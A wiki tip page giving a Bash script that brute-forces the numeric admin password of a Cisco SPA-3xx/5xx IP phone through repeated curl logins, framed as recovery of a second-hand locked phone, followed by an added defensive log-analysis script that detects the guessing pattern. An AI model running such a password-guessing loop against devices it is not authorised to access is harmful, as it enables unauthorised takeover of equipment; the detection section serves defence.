Cisco SPA-3xx or SPA-5xx Brute Force Password Recovery

Save the script below as a Bash script on a Linux or Mac machine and use it to determine the admin password of a locked phone you may have purchased second hand.

NOTE: this script can take SEVERAL days! It works by doing a brute force attack against the phone: it tries every numeric password from 1 to 999999 against the phone's admin web page until one is accepted.

Once discovered, the script will record the password on the LAST line in a file it creates while running. The file will be called password.txt.

You can then use this password to unlock and then factory default the phone.

The script requires the phone's LAN IP address and its serial number. Set these in the two variables (ip and serial) near the top of the script before executing it. Then have PATIENCE!

#!/bin/bash
#This script was written by John Rogers, K1WIZ.  The intention of this script is to recover the 
#admin password on a Cisco SPAxxx phone when the admin password is not known.  
#
#The script creates a file in the same directory called password.txt and when it finds the correct
#password, it writes it on the last line of the file and then the script dies.   The recovered 
#password can then be used to factory reset the phone.   

# FUCK YOU MEGAPATH FOR LOCKING PHONES!   FUCK YOUUUUU!  

# IP Address of the phone on your LAN
ip='10.0.1.224'
# Serial Number of the Phone you are unlocking
serial='cbt150'

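# Try every numeric password from 1 to 999999 (no leading zeros)
for ((pass=1; pass<=999999; pass++)); do

	# Request the admin page with this password and count the response lines
	# that contain the serial number; the script treats a response containing
	# the serial number as a successful login
	flag=$(/usr/bin/curl -s --anyauth -u "admin:$pass" "http://$ip/admin/#" | grep -ci "$serial")

	if [ "$flag" -eq 1 ]; then
		echo "password is: " $pass >> password.txt
		exit 0
	fi

	# Every failed attempt is logged too, so password.txt grows with each guess
	echo "it aint" $pass >> password.txt
done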
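
The loop above leaves a recognisable footprint: one client producing a long run of HTTP 401 responses on /admin/. The following is an added example, not part of the original script, that flags that pattern in an access log. It assumes a proxy or network sensor in front of the phone writes Common Log Format lines; the function names, the threshold and the sample log lines are constructed for illustration.

```bash
#!/bin/bash
# Added example (not from the original page): flag clients that generate many
# HTTP 401 responses on /admin/, the footprint left by the loop above.
# Assumption: Common Log Format lines from a proxy or sensor in front of the
# phone. curl --anyauth probes without credentials first, so a single guess
# can log two 401s; tune the threshold with that in mind.

# detect_admin_bruteforce THRESHOLD < logfile
# Prints "client_ip failed_401 later_200" for each client whose 401 count on
# /admin paths reaches THRESHOLD. later_200 is "yes" when a 200 on /admin
# followed that many failures (a guess may have succeeded), otherwise "no".
detect_admin_bruteforce() {
  local threshold="$1"
  awk -v t="$threshold" '
    {
      ip = $1; path = $7; status = $9
      if (path !~ /^\/admin/) next
      if (status == 401) fails[ip]++
      else if (status == 200 && (ip in fails) && fails[ip] >= t) hit[ip] = 1
    }
    END {
      for (ip in fails)
        if (fails[ip] >= t) {
          s = (ip in hit) ? "yes" : "no"
          print ip, fails[ip], s
        }
    }' | sort
}

# Constructed sample input: one host making six failed guesses and then
# getting in, and one user who mistypes the password once.
sample_log() {
  local n
  for n in 1 2 3 4 5 6; do
    echo "10.0.1.50 - admin [01/Jan/2024:10:00:0$n +0000] \"GET /admin/ HTTP/1.1\" 401 0"
  done
  echo '10.0.1.50 - admin [01/Jan/2024:10:00:07 +0000] "GET /admin/ HTTP/1.1" 200 5120'
  echo '10.0.1.77 - admin [01/Jan/2024:10:05:00 +0000] "GET /admin/ HTTP/1.1" 401 0'
  echo '10.0.1.77 - admin [01/Jan/2024:10:05:09 +0000] "GET /admin/ HTTP/1.1" 200 5120'
}

# With a threshold of 5 only the guessing host is reported.
sample_log | detect_admin_bruteforce 5
```

A "yes" in the last column is the case to investigate first, since it means the admin page was served to that client after the failures.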
kb/tips.and.tricks/cisco.3xx.5xx.brute.force.password.recover.txt · Last modified: 2021/10/17 19:12 by kg6baj